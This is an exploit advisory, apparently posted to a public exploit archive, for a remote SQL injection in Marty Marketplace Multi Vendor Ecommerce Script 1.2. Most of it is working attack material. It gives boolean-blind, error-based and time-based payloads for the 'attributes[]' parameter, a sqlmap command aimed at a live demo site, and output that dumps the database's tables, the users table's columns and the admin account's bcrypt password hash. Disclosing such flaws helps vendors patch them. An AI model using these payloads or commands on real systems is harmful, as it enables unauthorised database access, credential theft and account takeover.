Home Tools Exploits & CVE's Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection

Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection

Authored by CraCkEr

Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.

││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┘ [ Exploits ] ┌┘
: Author : CraCkEr │ │ :
│ Website : sangvish.com │ │ │
│ Vendor : SangVish Technologies │ │ │
│ Software : Marty Marketplace Multi Vendor │ │ Open Source Marketplace PHP script for │
│ Ecommerce Script v1.2 │ │ eCommerce marketplace platforms │
│ Vuln Type: Remote SQL Injection │ │ in the market │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┘ ┌┘

Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear

CryptoJob (Twitter) twitter.com/CryptozJob

Special Greetz to The Lebanese National Basketball Team for the results of
the FIBA Asia Cup
┌┘ © CraCkEr 2022 ┌┘

GET parameter 'attributes[]' is vulnerable
Parameter: attributes[] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)

Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6

[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch

[+] fetching current database

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'

[+] fetching tables for database: 'garudan_buy2marty'

Database: garudan_buy2marty
[105 tables]

| activations |
| ads |
| ads_translations |
| audit_histories |
| categories |
| categories_translations |
| contact_replies |
| contacts |
| dashboard_widget_settings |
| dashboard_widgets |
| ec_brands |
| ec_brands_translations |
| ec_cart |
| ec_currencies |
| ec_customer_addresses |
| ec_customer_password_resets |
| ec_customers |
| ec_discount_customers |
| ec_discount_product_collections |
| ec_discount_products |
| ec_discounts |
| ec_flash_sale_products |
| ec_flash_sales |
| ec_flash_sales_translations |
| ec_grouped_products |
| ec_order_addresses |
| ec_order_histories |
| ec_order_product |
| ec_orders |
| ec_product_attribute_sets |
| ec_product_attribute_sets_translations |
| ec_product_attributes |
| ec_product_attributes_translations |
| ec_product_categories |
| ec_product_categories_translations |
| ec_product_category_product |
| ec_product_collection_products |
| ec_product_collections |
| ec_product_collections_translations |
| ec_product_cross_sale_relations |
| ec_product_label_products |
| ec_product_labels |
| ec_product_labels_translations |
| ec_product_related_relations |
| ec_product_tag_product |
| ec_product_tags |
| ec_product_tags_translations |
| ec_product_up_sale_relations |
| ec_product_variation_items |
| ec_product_variations |
| ec_product_with_attribute |
| ec_product_with_attribute_set |
| ec_products |
| ec_products_translations |
| ec_reviews |
| ec_shipment_histories |
| ec_shipments |
| ec_shipping |
| ec_shipping_rule_items |
| ec_shipping_rules |
| ec_store_locators |
| ec_taxes |
| ec_wish_lists |
| failed_jobs |
| faq_categories |
| faq_categories_translations |
| faqs |
| faqs_translations |
| jobs |
| language_meta |
| languages |
| media_files |
| media_folders |
| media_settings |
| menu_locations |
| menu_nodes |
| menus |
| meta_boxes |
| migrations |
| mp_customer_revenues |
| mp_customer_withdrawals |
| mp_stores |
| mp_vendor_info |
| newsletters |
| pages |
| pages_translations |
| password_resets |
| payments |
| post_categories |
| post_tags |
| posts |
| posts_translations |
| revisions |
| role_users |
| roles |
| settings |
| simple_slider_items |
| simple_sliders |
| slugs |
| tags |
| tags_translations |
| translations |
| user_meta |
| users |
| widgets |

[+] fetching columns for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[15 columns]

| Column | Type |
| avatar_id | int(10) unsigned |
| created_at | timestamp |
| email | varchar(191) |
| email_verified_at | timestamp |
| first_name | varchar(191) |
| id | bigint(20) unsigned |
| last_login | timestamp |
| last_name | varchar(191) |
| manage_supers | tinyint(1) |
| password | varchar(191) |
| permissions | text |
| remember_token | varchar(100) |
| super_user | tinyint(1) |
| updated_at | timestamp |
| username | varchar(60) |

[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[1 entry]

| id | username | password | super_user | permissions |
| 1 | admin | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1 | NULL |
Possible algorithms: bcrypt $2*$, Blowfish (Unix)

[-] Done

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